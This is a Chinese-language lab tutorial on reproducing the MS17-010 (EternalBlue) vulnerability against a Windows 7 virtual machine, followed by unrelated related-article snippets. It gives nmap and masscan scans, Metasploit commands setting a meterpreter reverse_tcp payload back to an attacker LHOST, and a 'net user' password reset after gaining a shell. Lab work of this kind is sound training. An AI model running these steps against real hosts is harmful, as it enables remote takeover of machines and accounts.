MS17-010漏洞复现(带win7虚拟机安装,零基础)
WIN7虚拟机安装
1.先下载win7原装镜像
MSDN, 我告诉你 - 做一个安静的工具站
然后打开VM,把虚拟机安装进来
1.选择自定义(高级)
2.选择默认的
3.选择稍后安装系统
4.选择windows操作系统和 Win7版本
5.选择合适位置
6.选择BIOS
7.选择处理器数量
8.选择内存大小
9.选择网络类型为NET
之后都选择默认就可以了
10.
成功完成基础设置
在CD/DVD中选择我们之前下载的镜像文件
1.
2.
点击确定开机
然后点击安装
点击接受和下一步
点击自定义(高级)
等待完成安装重启
取名为admin
随便输入一个密码,不记得都可以
跳过
使用推荐配置,家庭网络
成功进入后重启
开始复现永恒之蓝漏洞(装好win7 64位可以直接跳到这一步)
1、扫描局域网内的C段主机(主机发现)
输入命令:
nmap -sP 192.168.159.1/24
得到主机ip
为
192.168.159.141
2、扫描端口获得运行的服务
nmap:
nmap -p 1-65535 -A 192.168.159.141
masscan:
masscan --rate=10000 -p1-65535 192.168.159.141
扫描到开放了445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞,这代表我们可能可以利用永恒之蓝漏洞
3.进入MSF控制台
命令:
msfconsole寻找永恒之蓝漏洞:
search ms17-010
3是永恒之蓝扫描模块,探测主机是否存在永恒之蓝的漏洞
1是永恒之蓝的攻击模块,借此攻击目标用户
我们先要扫描目标是否存在永恒之漏洞
输入命令
use 3
或者
use auxiliary/scanner/smb/smb_ms17_010 然后查看该模块所需要的参数配置
show options
若Required栏为yes则代表该参数需要填写
设置RHOST(攻击目标的ip)
set rhosts 192.168.159.141
执行扫描
run Host is likely VULNERABLE to MS17-010
显示主机很可能能够会受到永恒之蓝漏洞的攻击,代表我们现在可以攻击
开始攻击
使用攻击模块:
use 1设置payload
set payload windows/x64/meterpreter/reverse_tcp查看需要配置参数
show options
设置目标攻击ip(Win7主机的ip)
set rhosts 192.168.159.141设置接受shell的ip(攻击机ip,kali的ip)
set LHOST 192.168.159.88执行攻击
run
成功拿到权限
查看系统版本
sysinfo
修改密码
shell显示本地计算机的所有用户帐户列表:
net user该命令用于增加或修改系统用户,以及查看它们的信息。
修改密码
net user admin 新密码
net user admin 123456成功用123456登入
到这里就完成了基础的渗透
MS17-010漏洞复现(带win7虚拟机安装,零基础)相关推荐
- 群辉nas虚拟linux,UNRAID教程:3分钟 用unraid自带的虚拟机 安装 黑群晖NAS DSM系统 很强大!...
UNRAID教程:3分钟 用unraid自带的虚拟机 安装 黑群晖NAS DSM系统 很强大! 2019-12-20 20:00:00 305点赞 879收藏 306评论 创作立场声明:不喜勿喷,谢谢 ...
- 【Windows】win7虚拟机安装VMware Tools
问题 安装程序无法自动安装Virtual Machine Communication Interface(VMCI)驱动程序.必须手动安装此驱动程序. 原因 vm和win7的算法不同从.win7是已经 ...
- vmware win7虚拟机安装vmtools坑
win7镜像下载 要下带SP1这个记号的,表示有service pack 1这个补丁的.一定一定记得,不然vmtools装不上. 补丁 vmtools安装期间有很多驱动安不上的话,首先,安装一个非IE ...
- unraid虚拟linux系统,UNRAID教程:3分钟 用unraid自带的虚拟机 安装 黑群晖NAS DSM系统 很强大!...
前言 大家好,俺又来了. 相信很多朋友,真的是久等了吧,这已经是我写的第四篇关于UNRAID的文章了. 这篇文章内容,是教给大家,如何用UNRAID自带的虚拟机来安装 一个群晖NAS系统. (本次文章 ...
- unraid虚拟linux系统,UNRAID教程:3分钟用unraid自带的虚拟机安装黑群晖NAS DSM系统很强大!...
UNRAID教程:用unraid自带虚拟机安装DSM系统,打造小我黑群晖nas . X3 I* h$ b6 }9 T 7 X4 |1 r P/ h原文作者 阿文菌% P' h0 T3 p. ` 9 ...
- Win7虚拟机安装 Mac OS X Lion 10 7 2 及 XCode 4 2 1 iOS SDK5 0 作开
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow 也欢迎大家转载本篇文章.分享知识,造福人民,实现我们中华民族伟大复兴! 虚拟机扫 ...
- VMWARE中WIN7虚拟机安装VMWARE TOOLS提示“安装程序无法自动安装 Virtual Machine Communication Interface Sockets“解决方法
系统补丁 链接:https://pan.baidu.com/s/1X5Cuw8WJ90QgkC-c6X5RWQ 提取码:v7om 里面有两个相同文件名的文件.其中,.cab后缀的可以直接使用,而在V ...
- 解决VMware 16在Win7虚拟机安装VMware Tools时报 “Windows 无法验证此驱动程序软件的发布者”问题
参考: [原创]解决VMware16无法在Win7安装VMTools的问题,报Windows 无法验证此驱动程序软件的发布者. 解决VMware16在虚拟机Windows7下安装VMware tool ...
- Win7虚拟机安装vs2019,亲测有效
一.Win7安装vs2019 1.需要安装Win7 KB2999226补丁,下载地址为:http://www.downyi.com/downinfo/46561.html 2.安装win后,先安装微软 ...
- 超详细,win7虚拟机安装
安装前准备:①下载好win7的镜像,最好新建一个文件夹便于区分 ②正常运行的VMware 下面开始安装流程 选择好版本如下,再点击下一步 点击浏览,最好新建一个文件夹便于记忆和区分,如下所示,再点击确 ...
最新文章
- GNU make manual 翻译(八十八)
- onKeyPress与。 onKeyUp和onKeyDown
- 5G NPN 行业专网 — 媒体行业 5G 专网部署方案
- 2.13 break和continue
- python中获取当前所有的logger
- 关于海量数据的SQL查询优化.........
- 32位有符号整数_[LeetCode] 8. 字符串转换整数 (atoi)
- 揭秘HTML5和CSS3
- 初识Mysql(part3)--我需要知道的7条Mysql语句之检索数据
- 【pyqt5学习】——给窗口添加图标
- cglib实现动态代理
- 回顾2017系列篇(二):移动端APP设计趋势
- PHP判断msg,小程序 msgSecCheck 检查内容是否违规违法,但所有内容都可通过问题...
- 朴素贝叶斯常见面试题
- 【渝粤教育】国家开放大学2018年秋季 0689-21T老年心理健康 参考试题
- 广州海珠php培训_海珠|海珠区第二实验小学教育集团成立两周年 初步实现集团内教师资源的“柔性流动”...
- 测试中 Fakes、Mocks 以及 Stubs 概念明晰
- 台式机使用笔记本电脑上网解决办法。
- 20. Converting Dotted Decimal to Prefix Notation
- spark 概述与安装